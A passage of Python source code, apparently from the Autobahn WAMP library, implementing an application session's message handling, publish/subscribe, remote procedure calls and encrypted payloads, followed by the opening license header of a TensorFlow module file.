log_msg = u"received encrypted payload, but no keyring active"
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_NO_KEYRING_ACTIVE, log_msg, enc_algo=msg.enc_algo)
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_error, msg.args, msg.kwargs = self._keyring.decrypt(True, msg.error, encrypted_payload)
except Exception as e:
log_msg = u"failed to decrypt application payload 1: {}".format(e)
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_DECRYPT_ERROR, log_msg, enc_algo=msg.enc_algo)
else:
if msg.error != decrypted_error:
log_msg = u"URI within encrypted payload ('{}') does not match the envelope ('{}')".format(decrypted_error, msg.error)
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_TRUSTED_URI_MISMATCH, log_msg, enc_algo=msg.enc_algo)
if enc_err:
return enc_err
if msg.error in self._uri_to_ecls:
ecls = self._uri_to_ecls[msg.error]
try:
# the following might fail, eg. TypeError when
# signature of exception constructor is incompatible
# with args/kwargs or when the exception constructor raises
if msg.kwargs:
if msg.args:
exc = ecls(*msg.args, **msg.kwargs)
else:
exc = ecls(**msg.kwargs)
else:
if msg.args:
exc = ecls(*msg.args)
else:
exc = ecls()
except Exception:
try:
self.onUserError(
txaio.create_failure(),
"While re-constructing exception",
)
except:
pass
if not exc:
# the following ctor never fails ..
if msg.kwargs:
if msg.args:
exc = exception.ApplicationError(msg.error, *msg.args, **msg.kwargs)
else:
exc = exception.ApplicationError(msg.error, **msg.kwargs)
else:
if msg.args:
exc = exception.ApplicationError(msg.error, *msg.args)
else:
exc = exception.ApplicationError(msg.error)
if hasattr(exc, 'enc_algo'):
exc.enc_algo = msg.enc_algo
return exc
class ApplicationSession(BaseSession):
"""
WAMP endpoint session.
"""
log = txaio.make_logger()
def __init__(self, config=None):
"""
Constructor.
"""
BaseSession.__init__(self)
self.config = config or types.ComponentConfig(realm=u"default")
self._transport = None
self._session_id = None
self._realm = None
self._goodbye_sent = False
self._transport_is_closing = False
# outstanding requests
self._publish_reqs = {}
self._subscribe_reqs = {}
self._unsubscribe_reqs = {}
self._call_reqs = {}
self._register_reqs = {}
self._unregister_reqs = {}
# subscriptions in place
self._subscriptions = {}
# registrations in place
self._registrations = {}
# incoming invocations
self._invocations = {}
def set_keyring(self, keyring):
"""
"""
self._keyring = keyring
def onOpen(self, transport):
"""
Implements :func:`autobahn.wamp.interfaces.ITransportHandler.onOpen`
"""
self._transport = transport
d = txaio.as_future(self.onConnect)
def _error(e):
return self._swallow_error(e, "While firing onConnect")
txaio.add_callbacks(d, None, _error)
def onConnect(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onConnect`
"""
self.join(self.config.realm)
def join(self, realm, authmethods=None, authid=None, authrole=None, authextra=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.join`
"""
# FIXME
if six.PY2 and type(realm) == str:
realm = six.u(realm)
if six.PY2 and type(authid) == str:
authid = six.u(authid)
if six.PY2 and type(authrole) == str:
authrole = six.u(authrole)
if self._session_id:
raise Exception("already joined")
# store the realm requested by client, though this might be overwritten later,
# when realm redirection kicks in
self._realm = realm
# closing handshake state
self._goodbye_sent = False
# send HELLO message to router
msg = message.Hello(realm, role.DEFAULT_CLIENT_ROLES, authmethods, authid, authrole, authextra)
self._transport.send(msg)
def disconnect(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.disconnect`
"""
if self._transport:
self._transport.close()
def is_connected(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.is_connected`
"""
return self._transport is not None
def is_attached(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.is_attached`
"""
return self._session_id is not None
def onUserError(self, fail, msg):
"""
This is called when we try to fire a callback, but get an
exception from user code -- for example, a registered publish
callback or a registered method. By default, this prints the
current stack-trace and then error-message to stdout.
ApplicationSession-derived objects may override this to
provide logging if they prefer. The Twisted implementation does
this. (See :class:`autobahn.twisted.wamp.ApplicationSession`)
:param fail: instance implementing txaio.IFailedFuture
:param msg: an informative message from the library. It is
suggested you log this immediately after the exception.
"""
if isinstance(fail.value, exception.ApplicationError):
self.log.error(fail.value.error_message())
else:
self.log.error(
u'{msg}: {traceback}',
msg=msg,
traceback=txaio.failure_format_traceback(fail),
)
def _swallow_error(self, fail, msg):
'''
This is an internal generic error-handler for errors encountered
when calling down to on*() handlers that can reasonably be
expected to be overridden in user code.
Note that it *cancels* the error, so use with care!
Specifically, this should *never* be added to the errback
chain for a Deferred/coroutine that will make it out to user
code.
'''
try:
self.onUserError(fail, msg)
except:
pass
return None
def onMessage(self, msg):
"""
Implements :func:`autobahn.wamp.interfaces.ITransportHandler.onMessage`
"""
if self._session_id is None:
# the first message must be WELCOME, ABORT or CHALLENGE ..
if isinstance(msg, message.Welcome):
if msg.realm:
self._realm = msg.realm
self._session_id = msg.session
details = SessionDetails(self._realm, self._session_id, msg.authid, msg.authrole, msg.authmethod, msg.authprovider, msg.authextra)
d = txaio.as_future(self.onJoin, details)
def _error(e):
return self._swallow_error(e, "While firing onJoin")
txaio.add_callbacks(d, None, _error)
elif isinstance(msg, message.Abort):
# fire callback and close the transport
details = types.CloseDetails(msg.reason, msg.message)
d = txaio.as_future(self.onLeave, details)
def _error(e):
return self._swallow_error(e, "While firing onLeave")
txaio.add_callbacks(d, None, _error)
elif isinstance(msg, message.Challenge):
challenge = types.Challenge(msg.method, msg.extra)
d = txaio.as_future(self.onChallenge, challenge)
def success(signature):
if signature is None:
raise Exception('onChallenge user callback did not return a signature')
if type(signature) == six.binary_type:
signature = signature.decode('utf8')
if type(signature) != six.text_type:
raise Exception('signature must be unicode (was {})'.format(type(signature)))
reply = message.Authenticate(signature)
self._transport.send(reply)
def error(err):
self.onUserError(err, "Authentication failed")
reply = message.Abort(u"wamp.error.cannot_authenticate", u"{0}".format(err.value))
self._transport.send(reply)
# fire callback and close the transport
details = types.CloseDetails(reply.reason, reply.message)
d = txaio.as_future(self.onLeave, details)
def _error(e):
return self._swallow_error(e, "While firing onLeave")
txaio.add_callbacks(d, None, _error)
# switching to the callback chain, effectively
# cancelling error (which we've now handled)
return d
txaio.add_callbacks(d, success, error)
else:
raise ProtocolError("Received {0} message, and session is not yet established".format(msg.__class__))
else:
# self._session_id != None (aka "session established")
if isinstance(msg, message.Goodbye):
if not self._goodbye_sent:
# the peer wants to close: send GOODBYE reply
reply = message.Goodbye()
self._transport.send(reply)
self._session_id = None
# fire callback and close the transport
details = types.CloseDetails(msg.reason, msg.message)
d = txaio.as_future(self.onLeave, details)
def _error(e):
errmsg = 'While firing onLeave for reason "{0}" and message "{1}"'.format(msg.reason, msg.message)
return self._swallow_error(e, errmsg)
txaio.add_callbacks(d, None, _error)
elif isinstance(msg, message.Event):
if msg.subscription in self._subscriptions:
# fire all event handlers on subscription ..
for subscription in self._subscriptions[msg.subscription]:
handler = subscription.handler
topic = msg.topic or subscription.topic
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
# FIXME: behavior in error cases (no keyring, decrypt issues, URI mismatch, ..)
if not self._keyring:
self.log.warn("received encrypted payload, but no keyring active - ignoring encrypted payload!")
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_topic, msg.args, msg.kwargs = self._keyring.decrypt(False, topic, encrypted_payload)
except Exception as e:
self.log.warn("failed to decrypt application payload: {error}", error=e)
else:
if topic != decrypted_topic:
self.log.warn("envelope topic URI does not match encrypted one")
invoke_args = (handler.obj,) if handler.obj else tuple()
if msg.args:
invoke_args = invoke_args + tuple(msg.args)
invoke_kwargs = msg.kwargs if msg.kwargs else dict()
if handler.details_arg:
invoke_kwargs[handler.details_arg] = types.EventDetails(publication=msg.publication, publisher=msg.publisher, topic=topic, enc_algo=msg.enc_algo)
def _error(e):
errmsg = 'While firing {0} subscribed under {1}.'.format(
handler.fn, msg.subscription)
return self._swallow_error(e, errmsg)
future = txaio.as_future(handler.fn, *invoke_args, **invoke_kwargs)
txaio.add_callbacks(future, None, _error)
else:
raise ProtocolError("EVENT received for non-subscribed subscription ID {0}".format(msg.subscription))
elif isinstance(msg, message.Published):
if msg.request in self._publish_reqs:
# get and pop outstanding publish request
publish_request = self._publish_reqs.pop(msg.request)
# create a new publication object
publication = Publication(msg.publication, was_encrypted=publish_request.was_encrypted)
# resolve deferred/future for publishing successfully
txaio.resolve(publish_request.on_reply, publication)
else:
raise ProtocolError("PUBLISHED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Subscribed):
if msg.request in self._subscribe_reqs:
# get and pop outstanding subscribe request
request = self._subscribe_reqs.pop(msg.request)
# create new handler subscription list for subscription ID if not yet tracked
if msg.subscription not in self._subscriptions:
self._subscriptions[msg.subscription] = []
subscription = Subscription(msg.subscription, request.topic, self, request.handler)
# add handler to existing subscription
self._subscriptions[msg.subscription].append(subscription)
# resolve deferred/future for subscribing successfully
txaio.resolve(request.on_reply, subscription)
else:
raise ProtocolError("SUBSCRIBED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Unsubscribed):
if msg.request in self._unsubscribe_reqs:
# get and pop outstanding subscribe request
request = self._unsubscribe_reqs.pop(msg.request)
# if the subscription still exists, mark as inactive and remove ..
if request.subscription_id in self._subscriptions:
for subscription in self._subscriptions[request.subscription_id]:
subscription.active = False
del self._subscriptions[request.subscription_id]
# resolve deferred/future for unsubscribing successfully
txaio.resolve(request.on_reply, 0)
else:
raise ProtocolError("UNSUBSCRIBED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Result):
if msg.request in self._call_reqs:
call_request = self._call_reqs[msg.request]
proc = call_request.procedure
enc_err = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
log_msg = u"received encrypted payload, but no keyring active"
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_NO_KEYRING_ACTIVE, log_msg)
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_proc, msg.args, msg.kwargs = self._keyring.decrypt(True, proc, encrypted_payload)
except Exception as e:
log_msg = u"failed to decrypt application payload 1: {}".format(e)
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_DECRYPT_ERROR, log_msg)
else:
if proc != decrypted_proc:
log_msg = u"URI within encrypted payload ('{}') does not match the envelope ('{}')".format(decrypted_proc, proc)
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_TRUSTED_URI_MISMATCH, log_msg)
if msg.progress:
# process progressive call result
if call_request.options.on_progress:
if enc_err:
self.onUserError(enc_err, "could not deliver progressive call result, because payload decryption failed")
else:
kw = msg.kwargs or dict()
args = msg.args or tuple()
try:
# XXX what if on_progress returns a Deferred/Future?
call_request.options.on_progress(*args, **kw)
except Exception:
try:
self.onUserError(txaio.create_failure(), "While firing on_progress")
except:
pass
else:
# process final call result
# drop original request
del self._call_reqs[msg.request]
# user callback that gets fired
on_reply = call_request.on_reply
# above might already have rejected, so we guard ..
if enc_err:
txaio.reject(on_reply, enc_err)
else:
if msg.kwargs:
if msg.args:
res = types.CallResult(*msg.args, **msg.kwargs)
else:
res = types.CallResult(**msg.kwargs)
txaio.resolve(on_reply, res)
else:
if msg.args:
if len(msg.args) > 1:
res = types.CallResult(*msg.args)
txaio.resolve(on_reply, res)
else:
txaio.resolve(on_reply, msg.args[0])
else:
txaio.resolve(on_reply, None)
else:
raise ProtocolError("RESULT received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Invocation):
if msg.request in self._invocations:
raise ProtocolError("INVOCATION received for request ID {0} already invoked".format(msg.request))
else:
if msg.registration not in self._registrations:
raise ProtocolError("INVOCATION received for non-registered registration ID {0}".format(msg.registration))
else:
registration = self._registrations[msg.registration]
endpoint = registration.endpoint
proc = msg.procedure or registration.procedure
enc_err = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
log_msg = u"received encrypted INVOCATION payload, but no keyring active"
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_NO_KEYRING_ACTIVE, log_msg)
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_proc, msg.args, msg.kwargs = self._keyring.decrypt(False, proc, encrypted_payload)
except Exception as e:
log_msg = u"failed to decrypt INVOCATION payload: {}".format(e)
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_DECRYPT_ERROR, log_msg)
else:
if proc != decrypted_proc:
log_msg = u"URI within encrypted INVOCATION payload ('{}') does not match the envelope ('{}')".format(decrypted_proc, proc)
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_TRUSTED_URI_MISMATCH, log_msg)
if enc_err:
# when there was a problem decrypting the INVOCATION payload, we obviously can't invoke
# the endpoint, so we return an error to the caller instead
reply = self._message_from_exception(message.Invocation.MESSAGE_TYPE, msg.request, enc_err)
self._transport.send(reply)
else:
if endpoint.obj is not None:
invoke_args = (endpoint.obj,)
else:
invoke_args = tuple()
if msg.args:
invoke_args = invoke_args + tuple(msg.args)
invoke_kwargs = msg.kwargs if msg.kwargs else dict()
if endpoint.details_arg:
if msg.receive_progress:
def progress(*args, **kwargs):
encrypted_payload = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
raise Exception(u"trying to send encrypted payload, but no keyring active")
encrypted_payload = self._keyring.encrypt(False, proc, args, kwargs)
if encrypted_payload:
progress_msg = message.Yield(msg.request,
payload=encrypted_payload.payload,
progress=True,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
progress_msg = message.Yield(msg.request,
args=args,
kwargs=kwargs,
progress=True)
self._transport.send(progress_msg)
else:
progress = None
invoke_kwargs[endpoint.details_arg] = types.CallDetails(progress, caller=msg.caller, procedure=proc, enc_algo=msg.enc_algo)
on_reply = txaio.as_future(endpoint.fn, *invoke_args, **invoke_kwargs)
def success(res):
del self._invocations[msg.request]
encrypted_payload = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
log_msg = u"trying to send encrypted payload, but no keyring active"
self.log.warn(log_msg)
else:
try:
if isinstance(res, types.CallResult):
encrypted_payload = self._keyring.encrypt(False, proc, res.results, res.kwresults)
else:
encrypted_payload = self._keyring.encrypt(False, proc, [res])
except Exception as e:
log_msg = u"failed to encrypt application payload: {}".format(e)
self.log.warn(log_msg)
if encrypted_payload:
reply = message.Yield(msg.request,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
if isinstance(res, types.CallResult):
reply = message.Yield(msg.request,
args=res.results,
kwargs=res.kwresults)
else:
reply = message.Yield(msg.request,
args=[res])
try:
self._transport.send(reply)
except SerializationError as e:
# the application-level payload returned from the invoked procedure can't be serialized
reply = message.Error(message.Invocation.MESSAGE_TYPE, msg.request, ApplicationError.INVALID_PAYLOAD,
args=[u'success return value from invoked procedure "{0}" could not be serialized: {1}'.format(registration.procedure, e)])
self._transport.send(reply)
def error(err):
del self._invocations[msg.request]
errmsg = txaio.failure_message(err)
try:
self.onUserError(err, errmsg)
except:
pass
formatted_tb = None
if self.traceback_app:
formatted_tb = txaio.failure_format_traceback(err)
reply = self._message_from_exception(
message.Invocation.MESSAGE_TYPE,
msg.request,
err.value,
formatted_tb,
msg.enc_algo
)
try:
self._transport.send(reply)
except SerializationError as e:
# the application-level payload returned from the invoked procedure can't be serialized
reply = message.Error(message.Invocation.MESSAGE_TYPE, msg.request, ApplicationError.INVALID_PAYLOAD,
args=[u'error return value from invoked procedure "{0}" could not be serialized: {1}'.format(registration.procedure, e)])
self._transport.send(reply)
# we have handled the error, so we eat it
return None
self._invocations[msg.request] = InvocationRequest(msg.request, on_reply)
txaio.add_callbacks(on_reply, success, error)
elif isinstance(msg, message.Interrupt):
if msg.request not in self._invocations:
raise ProtocolError("INTERRUPT received for non-pending invocation {0}".format(msg.request))
else:
# noinspection PyBroadException
try:
self._invocations[msg.request].cancel()
except Exception:
# XXX can .cancel() return a Deferred/Future?
try:
self.onUserError(
txaio.create_failure(),
"While cancelling call.",
)
except:
pass
finally:
del self._invocations[msg.request]
elif isinstance(msg, message.Registered):
if msg.request in self._register_reqs:
# get and pop outstanding register request
request = self._register_reqs.pop(msg.request)
# create new registration if not yet tracked
if msg.registration not in self._registrations:
registration = Registration(self, msg.registration, request.procedure, request.endpoint)
self._registrations[msg.registration] = registration
else:
raise ProtocolError("REGISTERED received for already existing registration ID {0}".format(msg.registration))
txaio.resolve(request.on_reply, registration)
else:
raise ProtocolError("REGISTERED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Unregistered):
if msg.request in self._unregister_reqs:
# get and pop outstanding subscribe request
request = self._unregister_reqs.pop(msg.request)
# if the registration still exists, mark as inactive and remove ..
if request.registration_id in self._registrations:
self._registrations[request.registration_id].active = False
del self._registrations[request.registration_id]
# resolve deferred/future for unregistering successfully
txaio.resolve(request.on_reply)
else:
raise ProtocolError("UNREGISTERED received for non-pending request ID {0}".format(msg.request))
elif isinstance(msg, message.Error):
# remove outstanding request and get the reply deferred/future
on_reply = None
# ERROR reply to CALL
if msg.request_type == message.Call.MESSAGE_TYPE and msg.request in self._call_reqs:
on_reply = self._call_reqs.pop(msg.request).on_reply
# ERROR reply to PUBLISH
elif msg.request_type == message.Publish.MESSAGE_TYPE and msg.request in self._publish_reqs:
on_reply = self._publish_reqs.pop(msg.request).on_reply
# ERROR reply to SUBSCRIBE
elif msg.request_type == message.Subscribe.MESSAGE_TYPE and msg.request in self._subscribe_reqs:
on_reply = self._subscribe_reqs.pop(msg.request).on_reply
# ERROR reply to UNSUBSCRIBE
elif msg.request_type == message.Unsubscribe.MESSAGE_TYPE and msg.request in self._unsubscribe_reqs:
on_reply = self._unsubscribe_reqs.pop(msg.request).on_reply
# ERROR reply to REGISTER
elif msg.request_type == message.Register.MESSAGE_TYPE and msg.request in self._register_reqs:
on_reply = self._register_reqs.pop(msg.request).on_reply
# ERROR reply to UNREGISTER
elif msg.request_type == message.Unregister.MESSAGE_TYPE and msg.request in self._unregister_reqs:
on_reply = self._unregister_reqs.pop(msg.request).on_reply
if on_reply:
txaio.reject(on_reply, self._exception_from_message(msg))
else:
raise ProtocolError("WampAppSession.onMessage(): ERROR received for non-pending request_type {0} and request ID {1}".format(msg.request_type, msg.request))
else:
raise ProtocolError("Unexpected message {0}".format(msg.__class__))
# noinspection PyUnusedLocal
def onClose(self, wasClean):
"""
Implements :func:`autobahn.wamp.interfaces.ITransportHandler.onClose`
"""
self._transport = None
if self._session_id:
# fire callback and close the transport
d = txaio.as_future(self.onLeave, types.CloseDetails(reason=types.CloseDetails.REASON_TRANSPORT_LOST, message="WAMP transport was lost without closing the session before"))
def _error(e):
return self._swallow_error(e, "While firing onLeave")
txaio.add_callbacks(d, None, _error)
self._session_id = None
d = txaio.as_future(self.onDisconnect)
def _error(e):
return self._swallow_error(e, "While firing onDisconnect")
txaio.add_callbacks(d, None, _error)
def onChallenge(self, challenge):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onChallenge`
"""
raise Exception("received authentication challenge, but onChallenge not implemented")
def onJoin(self, details):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onJoin`
"""
return self.fire('join', self, details)
def onLeave(self, details):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onLeave`
"""
if details.reason.startswith('wamp.error.'):
self.log.error('{reason}: {wamp_message}', reason=details.reason, wamp_message=details.message)
self.fire('leave', self, details)
if self._transport:
self.disconnect()
# do we ever call onLeave with a valid transport?
def leave(self, reason=None, log_message=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.leave`
"""
if not self._session_id:
raise SessionNotReady(u"session hasn't joined a realm")
if not self._goodbye_sent:
if not reason:
reason = u"wamp.close.normal"
msg = wamp.message.Goodbye(reason=reason, message=log_message)
self._transport.send(msg)
self._goodbye_sent = True
# deferred that fires when transport actually hits CLOSED
is_closed = self._transport is None or self._transport.is_closed
return is_closed
else:
raise SessionNotReady(u"session was alread requested to leave")
def onDisconnect(self):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.onDisconnect`
"""
return self.fire('disconnect', self, True)
def publish(self, topic, *args, **kwargs):
"""
Implements :func:`autobahn.wamp.interfaces.IPublisher.publish`
"""
if six.PY2 and type(topic) == str:
topic = six.u(topic)
assert(type(topic) == six.text_type)
if not self._transport:
raise exception.TransportLost()
options = kwargs.pop('options', None)
if options and not isinstance(options, types.PublishOptions):
raise Exception("options must be of type a.w.t.PublishOptions")
request_id = self._request_id_gen.next()
encrypted_payload = None
if self._keyring:
encrypted_payload = self._keyring.encrypt(True, topic, args, kwargs)
if encrypted_payload:
if options:
msg = message.Publish(request_id,
topic,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer,
**options.message_attr())
else:
msg = message.Publish(request_id,
topic,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
if options:
msg = message.Publish(request_id,
topic,
args=args,
kwargs=kwargs,
**options.message_attr())
else:
msg = message.Publish(request_id,
topic,
args=args,
kwargs=kwargs)
if options and options.acknowledge:
# only acknowledged publications expect a reply ..
on_reply = txaio.create_future()
self._publish_reqs[request_id] = PublishRequest(request_id, on_reply, was_encrypted=(encrypted_payload is not None))
else:
on_reply = None
try:
# Notes:
#
# * this might raise autobahn.wamp.exception.SerializationError
# when the user payload cannot be serialized
            # * we have to set up a PublishRequest() in _publish_reqs _before_
            #   calling transport.send(), because a mock- or side-by-side transport
            #   will immediately lead to an incoming WAMP message in onMessage()
#
self._transport.send(msg)
except Exception as e:
if request_id in self._publish_reqs:
del self._publish_reqs[request_id]
raise e
return on_reply
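    # A minimal usage sketch (the topic URI is hypothetical; "session" is an
    # already-joined ApplicationSession):
    #
    #   session.publish(u'com.example.on_event', 42)   # fire-and-forget
    #   d = session.publish(u'com.example.on_event', 42,
    #                       options=types.PublishOptions(acknowledge=True))
    #   # with acknowledge=True, d resolves once the broker confirms the
    #   # publication; without it, publish() returns None.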
def subscribe(self, handler, topic=None, options=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISubscriber.subscribe`
"""
assert((callable(handler) and topic is not None) or hasattr(handler, '__class__'))
if topic and six.PY2 and type(topic) == str:
topic = six.u(topic)
assert(topic is None or type(topic) == six.text_type)
assert(options is None or isinstance(options, types.SubscribeOptions))
if not self._transport:
raise exception.TransportLost()
def _subscribe(obj, fn, topic, options):
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
handler_obj = Handler(fn, obj, options.details_arg if options else None)
self._subscribe_reqs[request_id] = SubscribeRequest(request_id, topic, on_reply, handler_obj)
if options:
msg = message.Subscribe(request_id, topic, **options.message_attr())
else:
msg = message.Subscribe(request_id, topic)
self._transport.send(msg)
return on_reply
if callable(handler):
# subscribe a single handler
return _subscribe(None, handler, topic, options)
else:
# subscribe all methods on an object decorated with "wamp.subscribe"
on_replies = []
for k in inspect.getmembers(handler.__class__, is_method_or_function):
proc = k[1]
if "_wampuris" in proc.__dict__:
for pat in proc.__dict__["_wampuris"]:
if pat.is_handler():
uri = pat.uri()
subopts = options or pat.subscribe_options()
on_replies.append(_subscribe(handler, proc, uri, subopts))
# XXX needs coverage
return txaio.gather(on_replies, consume_exceptions=True)
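    # A minimal usage sketch (topic URI and handler are hypothetical):
    #
    #   def on_event(msg):
    #       print(msg)
    #   d = session.subscribe(on_event, u'com.example.on_event')
    #   # d resolves to a Subscription once SUBSCRIBED is received; passing an
    #   # object decorated with "wamp.subscribe" instead subscribes all of its
    #   # handler methods and gathers the individual futures.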
def _unsubscribe(self, subscription):
"""
Called from :meth:`autobahn.wamp.protocol.Subscription.unsubscribe`
"""
assert(isinstance(subscription, Subscription))
assert subscription.active
assert(subscription.id in self._subscriptions)
assert(subscription in self._subscriptions[subscription.id])
if not self._transport:
raise exception.TransportLost()
# remove handler subscription and mark as inactive
self._subscriptions[subscription.id].remove(subscription)
subscription.active = False
# number of handler subscriptions left ..
scount = len(self._subscriptions[subscription.id])
if scount == 0:
# if the last handler was removed, unsubscribe from broker ..
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
self._unsubscribe_reqs[request_id] = UnsubscribeRequest(request_id, on_reply, subscription.id)
msg = message.Unsubscribe(request_id, subscription.id)
self._transport.send(msg)
return on_reply
else:
# there are still handlers active on the subscription!
return txaio.create_future_success(scount)
def call(self, procedure, *args, **kwargs):
"""
Implements :func:`autobahn.wamp.interfaces.ICaller.call`
"""
if six.PY2 and type(procedure) == str:
procedure = six.u(procedure)
assert(isinstance(procedure, six.text_type))
if not self._transport:
raise exception.TransportLost()
options = kwargs.pop('options', None)
if options and not isinstance(options, types.CallOptions):
raise Exception("options must be of type a.w.t.CallOptions")
request_id = self._request_id_gen.next()
encrypted_payload = None
if self._keyring:
encrypted_payload = self._keyring.encrypt(True, procedure, args, kwargs)
if encrypted_payload:
if options:
msg = message.Call(request_id,
procedure,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer,
**options.message_attr())
else:
msg = message.Call(request_id,
procedure,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
if options:
msg = message.Call(request_id,
procedure,
args=args,
kwargs=kwargs,
**options.message_attr())
else:
msg = message.Call(request_id,
procedure,
args=args,
kwargs=kwargs)
# FIXME: implement call canceling
# def canceller(_d):
# cancel_msg = message.Cancel(request)
# self._transport.send(cancel_msg)
# d = Deferred(canceller)
on_reply = txaio.create_future()
self._call_reqs[request_id] = CallRequest(request_id, procedure, on_reply, options)
try:
# Notes:
#
# * this might raise autobahn.wamp.exception.SerializationError
# when the user payload cannot be serialized
            # * we have to set up a CallRequest() in _call_reqs _before_
            #   calling transport.send(), because a mock- or side-by-side transport
            #   will immediately lead to an incoming WAMP message in onMessage()
#
self._transport.send(msg)
except:
if request_id in self._call_reqs:
del self._call_reqs[request_id]
raise
return on_reply
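    # A minimal usage sketch (the procedure URI is hypothetical):
    #
    #   d = session.call(u'com.example.add2', 2, 3)
    #   # d resolves to the remote result, or rejects with the exception
    #   # built by self._exception_from_message() on an ERROR reply.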
def register(self, endpoint, procedure=None, options=None):
"""
Implements :func:`autobahn.wamp.interfaces.ICallee.register`
"""
assert((callable(endpoint) and procedure is not None) or hasattr(endpoint, '__class__'))
if procedure and six.PY2 and type(procedure) == str:
procedure = six.u(procedure)
assert(procedure is None or type(procedure) == six.text_type)
assert(options is None or isinstance(options, types.RegisterOptions))
if not self._transport:
raise exception.TransportLost()
def _register(obj, fn, procedure, options):
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
endpoint_obj = Endpoint(fn, obj, options.details_arg if options else None)
self._register_reqs[request_id] = RegisterRequest(request_id, on_reply, procedure, endpoint_obj)
if options:
msg = message.Register(request_id, procedure, **options.message_attr())
else:
msg = message.Register(request_id, procedure)
self._transport.send(msg)
return on_reply
if callable(endpoint):
# register a single callable
return _register(None, endpoint, procedure, options)
else:
# register all methods on an object decorated with "wamp.register"
on_replies = []
for k in inspect.getmembers(endpoint.__class__, is_method_or_function):
proc = k[1]
if "_wampuris" in proc.__dict__:
for pat in proc.__dict__["_wampuris"]:
if pat.is_endpoint():
uri = pat.uri()
on_replies.append(_register(endpoint, proc, uri, options))
            # XXX needs coverage
return txaio.gather(on_replies, consume_exceptions=True)
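    # A minimal usage sketch (the procedure URI is hypothetical):
    #
    #   def add2(x, y):
    #       return x + y
    #   d = session.register(add2, u'com.example.add2')
    #   # d resolves to a Registration once REGISTERED is received; passing an
    #   # object decorated with "wamp.register" registers all of its endpoint
    #   # methods instead.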
def _unregister(self, registration):
"""
Called from :meth:`autobahn.wamp.protocol.Registration.unregister`
"""
assert(isinstance(registration, Registration))
assert registration.active
assert(registration.id in self._registrations)
if not self._transport:
raise exception.TransportLost()
request_id = self._request_id_gen.next()
on_reply = txaio.create_future()
self._unregister_reqs[request_id] = UnregisterRequest(request_id, on_reply, registration.id)
msg = message.Unregister(request_id, registration.id)
self._transport.send(msg)
return on_reply
# IApplicationSession.register collides with the abc.ABCMeta.register method
# IApplicationSession.register(ApplicationSession)
class ApplicationSessionFactory(object):
"""
WAMP endpoint session factory.
"""
session = ApplicationSession
"""
WAMP application session class to be used in this factory.
"""
def __init__(self, config=None):
"""
:param config: The default component configuration.
:type config: instance of :class:`autobahn.wamp.types.ComponentConfig`
"""
self.config = config or types.ComponentConfig(realm=u"default")
def __call__(self):
"""
Creates a new WAMP application session.
        :returns: An instance of the WAMP application session class as
            given by `self.session`.
"""
session = self.session(self.config)
session.factory = self
return session
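# A minimal usage sketch (the realm name is illustrative):
#
#   factory = ApplicationSessionFactory(types.ComponentConfig(realm=u'realm1'))
#   session = factory()   # a fresh ApplicationSession bound to factory.config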
| mit |
cancan101/tensorflow | tensorflow/contrib/cudnn_rnn/__init__.py | 27 | 1326 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
